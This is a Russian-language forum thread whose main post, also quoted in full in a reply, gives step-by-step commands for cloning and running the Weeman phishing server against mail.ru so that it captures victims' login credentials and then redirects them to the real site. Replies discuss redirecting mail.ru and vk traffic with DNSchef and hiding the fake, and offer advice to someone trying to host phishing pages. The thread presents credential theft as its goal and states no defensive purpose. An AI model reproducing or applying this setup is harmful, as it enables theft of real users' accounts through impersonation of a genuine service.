Статья Weeman: Phishing - web-сервер

Всем привет! Здесь я хочу показать, как легко поднять простой, но довольно эффективный web-server для фишинга.

upload_2016-10-31_21-25-7.png


Он будет захватывать все введенные жертвой учетные данные в формах и собственно, передавать их на терминал сервера.

Софт, который будет использоваться – это Weeman, http сервер для фишинга, написанный на Python. Итак, для того чтобы воспользоваться им, откроем терминал и введем следующую команду.

> git clone github.com/Hypsurus/weeman

Затем перейдем в папку, куда был скачан сервер, и выполним следующие команды:

> cd weeman/

> ls –a

> chmod a+x weeman.py

upload_2016-10-31_21-25-42.png


> ./weeman.py

> help (сразу посмотрим доступные опции)

upload_2016-10-31_21-26-12.png


> show (посмотрим текущие настройки)

upload_2016-10-31_21-26-41.png


Используем weeman на примере mail.ru.

> set url hppts://mail.ru

> set port 8080

> set action_url

> run

upload_2016-10-31_21-27-27.png


Теперь, при обращении к серверу по адресу, в моем случае это 192.168.0.101:8080, мы попадаем на фишинговый вариант сайта mail.ru, внешне ничем не отличается:

upload_2016-10-31_21-28-18.png


После того как мы введем свои учетные данные сработает редирект на подлинный сайт, а мы получим учетные данные.

upload_2016-10-31_21-28-52.png


На этом пожалуй все, спасибо за внимание.
 
M

Mo-riarty

Всем привет! Здесь я хочу показать, как легко поднять простой, но довольно эффективный web-server для фишинга.

Посмотреть вложение 7319

Он будет захватывать все введенные жертвой учетные данные в формах и собственно, передавать их на терминал сервера.

Софт, который будет использоваться – это Weeman, http сервер для фишинга, написанный на Python. Итак, для того чтобы воспользоваться им, откроем терминал и введем следующую команду.

> git clone github.com/Hypsurus/weeman

Затем перейдем в папку, куда был скачан сервер, и выполним следующие команды:

> cd weeman/

> ls –a

> chmod a+x weeman.py

Посмотреть вложение 7320

> ./weeman.py

> help (сразу посмотрим доступные опции)

Посмотреть вложение 7321

> show (посмотрим текущие настройки)

Посмотреть вложение 7322

Используем weeman на примере mail.ru.

> set url hppts://mail.ru

> set port 8080

> set action_url

> run

Посмотреть вложение 7323

Теперь, при обращении к серверу по адресу, в моем случае это 192.168.0.101:8080, мы попадаем на фишинговый вариант сайта mail.ru, внешне ничем не отличается:

Посмотреть вложение 7324

После того как мы введем свои учетные данные сработает редирект на подлинный сайт, а мы получим учетные данные.

Посмотреть вложение 7325

На этом пожалуй все, спасибо за внимание.
С Ip это сильно палевно )) люди поймут что это фэйк )
 

OBLIVIONNN

Green Team
22.08.2017
144
92
BIT
1
Как можно связать эту программу с DNSchef ?
Допустим запустил DNSchef на 127.0.0.1, что бы при переходе на mail,vk.. открылся 127.0.0.1:8080
 

Triton

Green Team
01.10.2016
189
99
BIT
89
Поможешь? Мне нужно просто выгрузить в инет html)
Увы нет. Мое время мне дороже. Друг мой, без обид, но думаю тебе стоит подучить матчасть, а не фишингом заниматься. Технически ничего сложного нет, способов доставки файла на VPS уйма.
 
  • Нравится
Реакции: GunQuest

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
Поможешь? Мне нужно просто выгрузить в инет html)

Хорошей тренировкой будет поднятие вирутальной машины на своей системе с доступом по SSH, настроенными сервисами необходимых для облсуживания web, так и руку набьете и тренировку совершите. )
 
  • Нравится
Реакции: GunQuest
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!